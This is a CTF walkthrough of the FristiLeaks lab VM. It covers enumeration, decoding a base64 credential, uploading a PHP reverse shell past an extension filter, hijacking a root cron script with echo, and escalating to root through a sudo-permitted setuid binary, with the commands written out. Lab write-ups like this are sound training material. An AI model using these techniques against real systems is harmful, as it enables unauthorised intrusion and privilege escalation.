FristiLeaks

Description

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..

Enumeration

nmap -p- -sV 192.168.2.19

nmap.JPG

dirb http://1952.168.2.19

dirb.JPG

Let’s start with robots.txt

robots.JPG
Nothing there to be found. Every page was filled with a pic saying I’m off track.

meme

I made a list with all the words found on the pages and ran it with dirb.
Finally another lead……/fristi/.

dirb2

This seems to be the login portal with an username:password identification.
No SQLi or other notable vulnerabilities. Let’s see the source code.
The information on the page suggest that the image is base64 encoded. So a quick search on the web learns that the first code is the Simpsons pic and the second one is a combination of 2 letters.

base64

This page is created by eezeepz. Would this name plus the letters from the pic be the right combination to login successfully? Yes is would. 🙂

succes

Ok. Now to upload a ‘dirty’ file. Looks like there is a filter and it’s only allowed to use a file with the extension jpg, gif or png. Time to start up Burpsuite and tamper with the file extension. I prefer the php-reverse-shell from pentestmonkey.
Success with the upload and in meantime I started listening on port 31337.

shell

After checking the /home/ directory it seems I can only read the directory from  eezeepz.
Inside there is a text file with the name ‘notes’.

notes

Ok. So I have access to echo and chmod and I can use it from /home/admin/.
And from /tmp/ a file named runthis will get executed every minute by root. Well that’s nice. Let’s get the /home/admin/ world writable.

echo “/home/admin/chmod -R 777 /home/admin” > /tmp/runthis

Success!

Let’s check out the /home/admin/ directory. Inside there are a few interesting files.

home-admin

Let’s start with whoisyourgodnow.txt first.

cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

Hmmmmmm. Let’s try another one.

cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

Hmmmmmm. Still nothing.

sh-4.1$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], ‘rot13’)

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

Right.
So the string in cryptedpass.txt is encrypted by cryptpass.py and now needs to be reversed. Let’s write a similar script to reverse the process.

decrypt1

decrypt2

So, I now have 2 plaintexts. Seeing that one of the ciphertexts is owned by a user called fristigod it could be rewarding to switch to this user.

su fristigod
standard in must be a tty

I need a tty. Let’s get one.

python -c ‘import pty;pty.spawn(“/bin/bash”)’
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ whoami
whoami
fristigod

Let’s find more stuff from fristigod.

find / print | grep -i fristigod
/var/fristigod
/var/fristigod/.bash_history
/var/fristigod/.secret_admin_stuff
/var/fristigod/.secret_admin_stuff/doCom

Who doesn’t like secret stuff? What could it be?

file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
bash-4.1$ ./doCom
./doCom
Nice try, but wrong user 😉

Bummer.  But what can this account do?

sudo -l -U fristigod

Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep=”COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS”, env_keep+=”MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE”, env_keep+=”LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES”, env_keep+=”LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY”,
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

So. fristigod can run doCom, but as fristi. Let’s try that.

sudo -u fristi ./doCom
Usage: ./program_name terminal_command …
bash-4.1$ sudo -u fristi ./doCom whoami
sudo -u fristi ./doCom whoami
root

Alright. Time to wrap things up.

sudo -u fristi ./doCom /bin/bash
bash-4.1# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Let’s go to the root directory and take a look inside.
A file named fristileaks_secrets.txt

cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it’s supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Too bad not in the 4 hours. But hey. There is always room for improvement.

 

Advertenties